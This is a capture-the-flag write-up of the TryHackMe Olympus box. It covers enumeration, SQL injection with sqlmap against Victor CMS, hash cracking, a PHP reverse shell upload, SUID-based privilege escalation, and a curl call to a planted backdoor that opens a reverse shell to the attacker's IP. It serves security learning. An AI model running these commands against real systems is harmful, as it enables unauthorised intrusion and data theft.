CTF : Olympus

CTF Olympus writeup. Source THM. Announced difficulty level: Medium

Posted by Boula-Bytes on 18 July 2022

CTF : Olympus

Informations

  • IP: 10.10.190.244
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p22,80 -A 10.10.190.244
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 17:30 CEST
Nmap scan report for 10.10.190.244
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://olympus.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   36.23 ms 10.9.0.1
2   36.22 ms 10.10.190.244

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.96 seconds

As we see there is a redirection on olympus.thm. So I added this entry to my /etc/hosts.

console
$ sudo nmap -p22,80 -A olympus.thm
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 17:32 CEST
Nmap scan report for olympus.thm (10.10.190.244)
Host is up (0.043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Olympus
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   36.36 ms 10.9.0.1
2   36.36 ms olympus.thm (10.10.190.244)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.72 seconds

Vulnerabilities search

There is a message on main page :

html
[...]
<meta name="Keywords" content="AperiSolve, Aprisolve, Aperi'Solve, Apri'Solve, Zeecka">
[...]
<div>The website is still under developpment.</div>
<div id="notimage" class="hidden">If support is needed, please contact root@the-it-department. The old version of the website is still accessible on this domain.</div>
[...]

It seems that a sub domain could exists. Let's search for it :

console
$ gobuster vhost -u http://olympus.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://olympus.thm
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/07/19 16:34:22 Starting gobuster in VHOST enumeration mode
===============================================================
Found: chat.olympus.thm (Status: 200) [Size: 1577]

===============================================================
2022/07/19 16:35:02 Finished
===============================================================

I added chat.olympus.thm to my /etc/hosts file.

I landed on login page but no clue to get creds...

So, enumeration...

console
$ dirsearch -u http://olympus.thm -w /usr/share/seclists/Discovery/Web-Content/common.txt -f

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 31947

Output File: /home/boula/.dirsearch/reports/olympus.thm/_22-07-19_17-16-08.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-07-19_17-16-08.log

Target: http://olympus.thm/

[17:16:08] Starting: 
[17:16:50] 403 -  276B  - /icons/
[17:16:51] 200 -    2KB - /index.php
[17:16:54] 301 -  315B  - /javascript  ->  http://olympus.thm/javascript/
[17:16:54] 403 -  276B  - /javascript/
[17:17:15] 403 -  276B  - /phpmyadmin/
[17:17:15] 403 -  276B  - /phpmyadmin
[17:17:32] 403 -  276B  - /server-status
[17:17:32] 403 -  276B  - /server-status/
[17:17:39] 200 -    2KB - /static/
[17:17:39] 301 -  311B  - /static  ->  http://olympus.thm/static/
[17:18:03] 301 -  315B  - /~webmaster  ->  http://olympus.thm/~webmaster/
[17:18:03] 200 -    9KB - /~webmaster/

http://olympus.thm/~webmaster/index.php leads to an instance of victor CMS

console
$ searchsploit victor
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting                          | php/webapps/48511.txt
Victor CMS 1.0 - 'cat_id' SQL Injection                                              | php/webapps/48485.txt
Victor CMS 1.0 - 'comment_author' Persistent Cross-Site Scripting                    | php/webapps/48484.txt
Victor CMS 1.0 - 'post' SQL Injection                                                | php/webapps/48451.txt
Victor CMS 1.0 - 'Search' SQL Injection                                              | php/webapps/48734.txt
Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting                    | php/webapps/48626.txt
Victor CMS 1.0 - Authenticated Arbitrary File Upload                                 | php/webapps/48490.txt
Victor CMS 1.0 - File Upload To RCE                                                  | php/webapps/49310.txt
Victor CMS 1.0 - Multiple SQL Injection (Authenticated)                              | php/webapps/49282.txt
Victory FTP Server 5.0 - Denial of Service                                           | windows/dos/16230.py
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is maybe a way to use an SQLi...

Exploit

I saved the post request from a search request via burp and I used it through sqlmap to get access to the mysql database and dump it.

shell
sqlmap -r chat_upload_post.txt --level=5 --risk=3 --dump-all

Then I found hashes in the user table :

prometheus:$2y$10$--------------
root:$2y$10$-------------
zeus:$2y$10$------------

I used john to crack them :

shell
john ./hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

And I found the prometheus' password.

I had been stuck for a long time with Victor CMS, because no other exploits worked.

I tried chat.olympus.thm and use the prometheus creds. It worked !

There was a discussion that explains that uploaded files were renamed randomly.

But in the previous dumped database there was a table called chats that maintained relation between the original file name and the new one.

So I uploaded a php reverse shell file and I used again sqlmap to find the new filename : 

shell
sqlmap -r victor_search_post.txt --level=5 --risk=3 --sql-shell -D olympus
sql
select * from chats;

Then I started pwncat on port 1234 and triggered the reverse shell : 

shell
curl 'http://chat.olympus.thm/uploads/63d20db27be50d4b469758e21901918b.php'

I finally got a shell

Privilege escalation

Enumeration for privesc

console
$ find / -user zeus -readable 2>/dev/null
/home/zeus
/home/zeus/zeus.txt
/home/zeus/user.flag
/home/zeus/.sudo_as_admin_successful
/home/zeus/.bash_logout
/home/zeus/.local
/home/zeus/.bashrc
/home/zeus/.profile
/usr/bin/cputils
/var/www/olympus.thm/public_html/~webmaster/search.php
console
$ ls -al /usr/bin/cputils
-rwsr-xr-x 1 zeus zeus 17728 Apr 18 09:27 /usr/bin/cputils

Ok, this bin should be usefull to privesc to zeus account...

I created a file /tmp/authorized_keys with my ssh public key.

Then I used /usr/bin/cputils to copy it as zeus into /home/zeus/.ssh/

Now I can use ssh to connect into the box as zeus

I found a suspicious directory : /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc

As zeus I could read VIGQFQFMYOST.php that seems to be a reverse php shell. It's password protected but the pass is hard coded in the php file.

Exploit

And here it is, I just need to use pwncat again 

shell
pwncat -lp 1235

And call the php script with the rights params : 

shell
curl 'http://10.10.190.244/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.9.85.5&port=1235'

I got a root shell :)

\o/

Bonus

There was a hidden flag :

shell
grep -r "flag{" /

This brutal... but it works ;)